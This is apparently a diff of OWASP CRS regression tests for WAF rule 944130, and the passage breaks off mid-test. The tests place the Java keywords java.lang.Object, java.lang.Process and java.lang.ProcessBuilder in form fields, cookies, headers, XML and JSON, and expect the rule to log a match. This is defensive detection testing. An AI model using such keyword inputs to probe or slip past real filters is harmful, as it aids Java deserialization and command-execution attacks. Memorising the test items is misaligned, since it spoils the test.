"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Object - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-303 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Object + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 303 desc: "XML attribute value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 304 desc: "XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_id: 305 desc: "Nested XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_id: 306 desc: "Content-Type text/plain includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_id: 307 desc: "Content-Type application/json arg value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Object\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log_contains: "id \"944130\"" + - test_id: 308 desc: "Content-Type application/json arg name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Object\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 309 desc: "Argument test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_id: 310 desc: "Argument name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log_contains: "id \"944130\"" + - test_id: 311 desc: "Cookie test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 312 desc: "Cookie name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Process=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 313 desc: "Request header test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-314 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 314 desc: "XML attribute value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 315 desc: "XML element value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_id: 316 desc: "Nested XML element value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_id: 317 desc: "Content-Type text/plain includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_id: 318 desc: "Content-Type application/json arg value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Process\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log_contains: "id \"944130\"" + - test_id: 319 desc: "Content-Type application/json arg name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Process\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 320 desc: "Argument test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 321 desc: "Argument name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944130\"" + - test_id: 322 desc: "Cookie test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 323 desc: "Cookie name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.ProcessBuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-324 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 324 desc: "Request header test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-325 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 325 desc: "XML attribute value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 326 desc: "XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 327 desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 328 desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 329 desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.ProcessBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_id: 330 desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 